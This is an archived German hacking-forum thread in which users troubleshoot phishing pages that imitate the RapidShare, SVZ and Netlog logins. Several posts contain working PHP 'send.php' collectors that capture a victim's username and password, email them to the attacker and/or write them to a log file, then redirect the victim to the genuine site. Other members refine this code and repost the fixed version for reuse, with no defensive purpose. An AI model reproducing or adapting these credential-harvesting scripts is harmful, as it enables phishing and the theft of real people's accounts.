PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Ist meine send.php richtig ?



Junkycool
02.04.2009, 12:51
Hey,



ich habe gerade meine rs Pishingseite überprüft und bemerkt, dass die send.php nix mehr an emails verschickt und auch die Weiterleitung sehr komisch ist.
Vll kann mir ja einer helfen hier:
[quote]<?php


$benutzer=$HTTP_POST_VARS['benutzer'];
$pass=$HTTP_POST_VARS['pass'];
if ($pass == "")
{
print("Bitte geben Sie ihr Passwort ein");
}
elseif ($benutzer == "")
{
print("Bitte geben Sie ihren Benutzernamen ein");
}
else
{
$mailtext="Benutzername:";
$mailtext.=$benutzer;
$mailtext.="\n";
$mailtext.="Passwort: ";
$mailtext.=$pass;
$absender="From:";
$absender.="rapidshare@phishing.de";
mail("XXXXX@web.de",$benutzer,$mailtext,$absender);


print("Es ist ein Fehler beim Login aufgetreten, bitte versuchen sie es erneut.");
}

$neue_datei = fopen("log.txt", a);
fwrite($neue_datei, "Benutzer:$benutzer \nPasswort:$pass \n\n\n");
fclose($neue_datei);
?>
<html>
<body>
<meta http-equiv="Refresh" content="1; url=https://ssl.rapidshare.com/premiumzone.html">
</body>
</html>


es handelt sich um rapidshare Premium Zone ...




lg

lolly
02.04.2009, 13:07
Ich bin mir nicht so sicher aber soweit ich weiß muss für mail() auch der Maildienst auf dem Server eingeschaltet sein. Könnte es daran liegen, dass der ausgeschaltet ist?

VeN0m
02.04.2009, 14:49
Mh... Ich habe das mal so optimiert, wie ich denke, dass es richtig ist...



<?php
$benutzer = $_POST['benutzer'];
$pass = $_POST['pass'];
if (!$pass OR $pass == "")
{
print "Bitte geben Sie ihr Passwort ein" AND exit;
}
elseif (!$benutzer OR $benutzer == "")
{
print "Bitte geben Sie ihren Benutzernamen ein" AND exit;
}
else
{
$mailtext = "Benutzername:";
$mailtext .= $benutzer;
$mailtext .= "\n";
$mailtext .= "Passwort: ";
$mailtext .= $pass;
$name = "Phishing";
$email = "phishing@rapidshare.com";
$header = "From: ". $name . " <" . $email . ">\r\n";
mail("XXXXX@web.de",$benutzer,$mailtext,$header);


print "Es ist ein Fehler beim Login aufgetreten, bitte versuchen sie es erneut.";
}

$neue_datei = fopen("log.txt", a);
fwrite($neue_datei, "Benutzer:$benutzer \nPasswort:$pass \n\n\n");
fclose($neue_datei);
header("location: https://ssl.rapidshare.com/premiumzone.html");
?>


Den Redirekt auf alle Fälle mit dem Header()-Befehl. Den Meta-Befehl in HTML nutzt eigentlich keiner mehr ;). Optional kannst Du den auch an den Anfang setzen. Wäre hier nur nicht so gut, da Du ja eine Fehlerausgabe gemacht hast.
Die anderen Änderungen sind nur klein aber ich denke so geht es.
Ansonsten: http://de2.php.net/manual/de/book.mail.php

Junkycool
02.04.2009, 21:43
also mail geht jetzt so wies aussieht, doch das mit dem "
Es ist ein Fehler beim Login aufgetreten, bitte versuchen sie es erneut."



das geht iwie nicht das wird gar nicht angezeigt ... wird direkt auf die real seite gelinkt



lg

VeN0m
02.04.2009, 21:50
Mh... Ich hatte ganz vergessen, dass Du den Hinweistext ja angezeigt haben möchtest ^^.
Dann ersetz den Header-Befehl nochmal:


header("refresh:3;url=seite");
print "Es ist ein Fehler beim Login aufgetreten, bitte versuchen Sie es erneut.";


URL=Seite. Das "Seite" ersetzt Du natürlich mit Deinem Ziel.
Refresh:3 ist die Zeit, die bis zum Refresh vergeht. Ähnlich oder gleich, wie beim Meta-Befehl. Drei genügt eigentlich. Ich hatte es vorhin noch getestet. Das ist genug Zeit ;).
Diese Codezeile setzt Du an die Stelle, wo der Fehler ausgegeben wird. Das Header am Schluss entfernst Du.
Müsste eigentlich gehen.

Junkycool
02.04.2009, 22:22
so also bei mir sieht das jetzt so aus:

<?php
$benutzer = $_POST['benutzer'];
$pass = $_POST['pass'];
if (!$pass OR $pass == "")
{
print "Bitte geben Sie ihr Passwort ein" AND exit;
}
elseif (!$benutzer OR $benutzer == "")
{
print "Bitte geben Sie ihren Benutzernamen ein" AND exit;
}
else
{
$mailtext = "Benutzername:";
$mailtext .= $benutzer;
$mailtext .= "\n";
$mailtext .= "Passwort: ";
$mailtext .= $pass;
$name = "Phishing";
$email = "phishing@rapidshare.com";
$header = "From: ". $name . " <" . $email . ">\r\n";
mail("sonXX.XXkX@web.de",$benutzer,$mailtext,$header);

header("refresh:3;url=https://ssl.rapidshare.com/premiumzone.html");
print "Es ist ein Fehler beim Login aufgetreten, bitte versuchen Sie es erneut.";
}

$neue_datei = fopen("log.txt", a);
fwrite($neue_datei, "Benutzer:$benutzer \nPasswort:$pass \n\n\n");
fclose($neue_datei);
?>



Jetz habe ich das nochmal ausprobiert und habe das gesehen:

Warning: mail() [function.mail (http://92.241.168.171/%7Ejunkie/function.mail)]: Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set() in C:\XXXX\www\XXXXX\send.php on line 22
Es ist ein Fehler beim Login aufgetreten, bitte versuchen Sie es erneut.
Notice: Use of undefined constant a - assumed 'a' in C:\XXXX\www\XXXXX\send.php on line 28



kannst du mir das ganze nochmal geben ? Also mit Verbesserungen usw. ?
Das mit dem Header habe ich anscheindend noch hinbekommen :)




lg

garwga
02.04.2009, 22:43
Das funktioniert nicht über localhost, weil du keinen Mailserver installiert hast. Sobald du das auf nen Webspace uppst müsste es eigentlich gehen, da die meisten Hoster das unterstützen.
MfG

VeN0m
02.04.2009, 22:47
mail("sonXX.XXkX@web.de",$benutzer,$mailtext,$head er);


Die Leerstelle dazwischen hast Du aber hoffentlich gerade hinzugedichtet? ;)
$header meine ich. Da steht in Deinem Code eine Leerstelle.

@garwga: "also mail geht jetzt so wies aussieht, doch das mit dem", sagte er oben. Heißt das nicht, dass es geht? Also vorher kam anscheinend noch kein Fehler ;).
Ich d enke es liegt an der Leerstelle. Ansonsten kann das auch am localhost liegen, was ich aber eher weniger glaube.

Junkycool
03.04.2009, 11:51
so vielen dank an euch alle :)
es klappt wieder super !
THX !


lg

Қסּɲɳᶓ
12.04.2009, 22:12
Will mich hier mal mit meinem Problem anschließen. Also ich habe eine SVZ-Phishing seite. Die hatte ich vorher bei funpic, hat auch alles geklappt. Nun wurde meine Page gelöscht und ich bin zu kilu.de umgezogen. Habe alle Dateien unverändert hochgeladen. Aber es klappt nicht mehr. Auf der Kilu-Hp gibt es einen Punkt SMTP Umleitung für mail(). Da habe ich nichts ausgefüllt, da ich nich weiß, was bei SMTP Server hinkommt. Meine send.php sieht wiefolgt aus:


<?php
$benutzer=$HTTP_POST_VARS['benutzer'];
$pass=$HTTP_POST_VARS['pass'];
if ($pass == "")
{
print("Bitte geben Sie ihr Passwort ein");
}
elseif ($benutzer == "")
{
print("Bitte geben Sie ihren Benutzernamen ein");
}
else
{
$mailtext="Benutzername:";
$mailtext.=$benutzer;
$mailtext.="\n";
$mailtext.="Passwort: ";
$mailtext.=$pass;
$absender="From: Phish <phish@freenet.de>";
mail("xxxx@web.de",$benutzer,$mailtext,$absender);

// Edit your Email Address and the text which will be printed after logging in !
print("Error!");
}
?>
<html>
<body>
<meta http-equiv="Refresh" content="1; url=http://www.gearfuse.com/wp-content/uploads/2007/10/nerd.jpg">
</body>
</html>I-welche Fehler? und was hat es mit dem SMTP auf sich? Ich glaube das ist der Fehler.

H4x0r007
12.04.2009, 22:44
Was wollt ihr alle mit eurem print? PHP = echo :D

VeN0m
12.04.2009, 23:29
@H4x0r007: Geschmackssache. Ich bevorzuge print, weil echo für mich einfach doof klingt.
@konne: Wieso nimmst Du nicht einfach das von uns bereits angepasste Script? Einfach die vorhergegangenen Beiträge lesen und alles korrekt zusammensetzen. Sollte gehen... Dein Script sieht nämlich in etwa so aus, wie das erste Script, was hier gepostet wurde.

int_main();
13.04.2009, 09:49
Früher war Print sogar schneller :-P.

btw, wieso eigentlich immer die weiterleitung per HTML?

Wieso nicht headerlocation?! ist viel s chneller.

VeN0m
13.04.2009, 13:04
Eben. Die Weiterleitung per HTML macht eigentlich überhaupt keinen Sinn. Wenn ich sofort auf eine andere Seite will dann entweder per JavaScript oder per PHP.

@Konne:




<?php
$benutzer = $_POST['benutzer'];
$pass = $_POST['pass'];
if (!$pass OR $pass == "")
{
print "Bitte geben Sie ihr Passwort ein" AND exit;
}
elseif (!$benutzer OR $benutzer == "")
{
print "Bitte geben Sie ihren Benutzernamen ein" AND exit;
}
else
{
$mailtext = "Benutzername:";
$mailtext .= $benutzer;
$mailtext .= "\n";
$mailtext .= "Passwort: ";
$mailtext .= $pass;
$name = "Phishing";
$email = "phishing@rapidshare.com";
$header = "From: ". $name . " <" . $email . ">\r\n";
mail("sonXX.XXkX@web.de",$benutzer,$mailtext,$header);

header("refresh:3;url=https://ssl.rapidshare.com/premiumzone.html");
print "Es ist ein Fehler beim Login aufgetreten, bitte versuchen Sie es erneut.";
}

$neue_datei = fopen("log.txt", a);
fwrite($neue_datei, "Benutzer:$benutzer \nPasswort:$pass \n\n\n");
fclose($neue_datei);
?>


Nimm halt diesen Code, der eigentlich auch bereits auf der ersten Seite stand. Du musst ihn eben nur für Dich korrekt anpassen.

Қסּɲɳᶓ
13.04.2009, 13:11
Hat sich auch schon bei mir erledigt, klappt alles wieder danke leute =)

kriw
13.04.2009, 13:12
Hallo hab auch eine kleine frage..
Kann man den Code so einstellen das ich eine E-Mail erhalte statt einen log?


<?php
header("Location: http://de.netlog.com/go/login");
$handle = fopen("netlog.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

VeN0m
13.04.2009, 13:19
Gucken sich die Leute eigentlich die Threads noch richtig an?
@Kriw: Der Code, den wir hier in Kleinarbeit korrigiert haben und den ich vor nichtmal einer halben Stunde oben erneut gepostet habe schickt Dir eine Email. Er muss eben nur korrekt angepasst werden. Zusätzlich erstellt sie dann noch einen Log. Wenn Du das nicht willst entfernst Du einfach folgendes:



$neue_datei = fopen("log.txt", a);
fwrite($neue_datei, "Benutzer:$benutzer \nPasswort:$pass \n\n\n");
fclose($neue_datei);


Und schon werden die Daten nurnoch per Email an Dich versandt... ;)